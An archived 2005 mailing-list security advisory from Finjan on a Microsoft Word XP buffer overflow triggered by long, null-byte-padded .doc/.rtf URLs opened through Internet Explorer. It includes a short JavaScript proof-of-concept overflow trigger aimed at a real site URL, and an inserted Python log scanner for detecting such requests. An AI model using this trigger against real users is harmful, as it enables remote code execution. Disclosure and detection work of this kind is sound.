Finjan Security Advisory: Microsoft Office XP Remote Buffer Overflow Vulnerability

From: Rafel Ivgi (rivgi_at_FINJAN.COM)
Date: 02/09/05

    Date:         Wed, 9 Feb 2005 02:18:45 +0200
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Finjan Security Advisory
    Microsoft Office XP Remote Buffer Overflow Vulnerability

    Introduction

    Finjan has discovered a new vulnerability in Microsoft Word
    XP that would allow a hacker to launch a buffer overflow attack.
    This attack could occur when a user opened a Word document using
    Internet Explorer.

    Technical Description

    When a ".doc" file is opened inside Internet Explorer, Microsoft
    Word XP "takes over" and opens that doc file. The problem appears
    when a request for a doc file contains a null byte (%00) at the end
    of the doc filename (the rtf extension is also vulnerable).

    For example:
    http://www.myhost.com/myfile.doc is a valid request.

    However, this:
    http://www.myhost.com/myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaa...aa.doc
    is an invalid request. Such a request will nevertheless be sent to
    the server hosting the doc file.

    Most servers, such as IIS and Apache, will truncate the filename at
    the %00 and return the file to Internet Explorer.
    At this stage, Internet Explorer hands the original, untruncated
    string over to Microsoft Word XP, which therefore receives a very
    long string. This string causes an exploitable buffer overflow,
    allowing remote code execution.
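    A server-side check for the request pattern described above, added
    here as an example (it is not part of Finjan's advisory). It scans
    constructed access-log lines for a document request whose filename is
    followed by an encoded control byte and an unusually long tail; the
    log format, the sample lines and the TAIL_THRESHOLD value are assumptions.

```python
import re

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = """\
203.0.113.5 - - [09/Feb/2005:02:18:45 +0200] "GET /docs/myfile.doc HTTP/1.1" 200 4096
203.0.113.7 - - [09/Feb/2005:02:19:01 +0200] "GET /docs/myfile.doc%00{tail} HTTP/1.1" 404 312
203.0.113.9 - - [09/Feb/2005:02:19:30 +0200] "GET /docs/report.rtf%0a{tail} HTTP/1.1" 404 312
203.0.113.9 - - [09/Feb/2005:02:19:31 +0200] "GET /docs/short.doc%00x.doc HTTP/1.1" 404 312
""".format(tail="a" * 5000 + ".doc")

DOC_EXT = re.compile(r"\.(?:doc|rtf)$", re.IGNORECASE)
# Percent-encoded NUL, LF or CR: the bytes a server truncates on but a
# client may still pass through to the document handler.
CTRL_BYTE = re.compile(r"%(?:00|0a|0d)", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
TAIL_THRESHOLD = 256  # assumed cut-off; tune to your environment


def classify_path(path: str):
    """Return (is_suspicious, tail_length) for one request path."""
    m = CTRL_BYTE.search(path)
    if not m:
        return False, 0
    head, tail = path[: m.start()], path[m.end():]
    # 'head' is what the server would serve; the whole string is what
    # the browser hands to the application registered for .doc/.rtf.
    if not DOC_EXT.search(head):
        return False, len(tail)
    return len(tail) >= TAIL_THRESHOLD, len(tail)


def scan_log(text: str):
    """Return one finding per log line that matches the pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST.search(line)
        if not m:
            continue
        suspicious, tail_len = classify_path(m.group(1))
        if suspicious:
            client = line.split(" ", 1)[0]
            findings.append({"line": lineno, "client": client, "tail_len": tail_len})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```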

    The Code (Proof of Concept)

    <script>
    var mylongstring, myjunk, c;
    mylongstring = "";
    myjunk = "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";
    for (c = 1; c < 5000; c++)
    {
      mylongstring = mylongstring + myjunk;
    }
    window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a" + mylongstring);
    </script>

    Vulnerability Status

    Microsoft was notified on July 13, 2004.
    The bug is now fixed. For further details please refer to Microsoft
    security bulletin MS05-004.

    Credit

    Rafel Ivgi, Malicious Code Research Center (MCRC), Finjan Software Ltd.


    --
    NTBugtraq Editor's Note:
    Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
    --
    
